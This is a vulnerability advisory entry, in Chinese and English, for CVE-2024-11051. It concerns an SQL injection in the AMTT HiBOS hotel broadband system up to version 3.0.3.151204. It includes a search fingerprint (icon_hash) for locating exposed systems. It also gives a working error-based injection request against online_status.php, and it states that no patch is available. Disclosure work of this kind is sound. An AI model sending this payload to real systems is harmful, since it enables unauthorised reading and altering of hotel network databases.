【原创】(CVE-2024-11051)安美微客(上海)互联网科技有限公司 HiBOS酒店宽带运营系统(HiBOS)<= V3.0.3.151204 SQL注入漏洞


当前为私密分享,无需登录即可查看。


时间 作者 可见性 等级 Rank
2024-10-22 23:57:09 Xe 公开的 高危 3

CVE-2024-11051
Created: 11/09/2024 05:01 PM
Updated: 11/10/2024 10:08 AM
Changes: 11/09/2024 05:01 PM (57), 11/10/2024 10:08 AM (30)
Submitter: Xe@wiki


漏洞描述

- Summary

HiBOS酒店宽带运营系统是一套全面的网络管理解决方案,专为酒店设计。它提供了高速、稳定的互联网连接,并支持用户登录管理、带宽分配、网络监控和数据分析功能。通过高度定制化的界面和操作,HiBOS系统能够优化网络性能,提升宾客的在线体验,同时帮助酒店管理人员高效监控和维护网络环境。

- AMTT Hotel Broadband Operation System (HiBOS) is a comprehensive network management solution designed specifically for hotels. It offers high-speed, stable internet connectivity and supports user login management, bandwidth allocation, network monitoring, and data analysis functionalities. Through its highly customizable interface and operations, the HiBOS system optimizes network performance, enhances online experiences for guests, and assists hotel management in efficiently monitoring and maintaining the network environment.

HiBOS酒店宽带运营系统(HiBOS)V3.0.3.151204及更早版本已被确定容易受到SQL注入漏洞的影响。当攻击者可以通过将恶意SQL代码插入输入字段(例如,用户输入)来操纵SQL查询时,就会出现这种类型的漏洞。如果利用这一点,攻击者可以直接与后端数据库进行交互,从而有可能读取敏感数据、修改数据库信息、对数据库执行管理操作,在某些情况下还可以控制服务器。

- It has been identified that the AMTT Hotel Broadband Operation System (HiBOS) version 3.0.3.151204 and earlier is susceptible to a SQL Injection vulnerability. This type of vulnerability occurs when an attacker can manipulate SQL queries by inserting malicious SQL code into an input field for execution (e.g., user input). If exploited, this could allow the attacker to interact directly with the backend database, potentially enabling them to read sensitive data, modify database information, execute administration operations on the database, and in some cases, take control of the server.

资产测绘

icon_hash="1259797304"

POC

GET /manager/frontdesk/online_status.php?AccountID=1%27or%20updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20or%20%27 HTTP/1.1
Host: 

null

漏洞补丁

暂无


审核评价: 没有任何评价...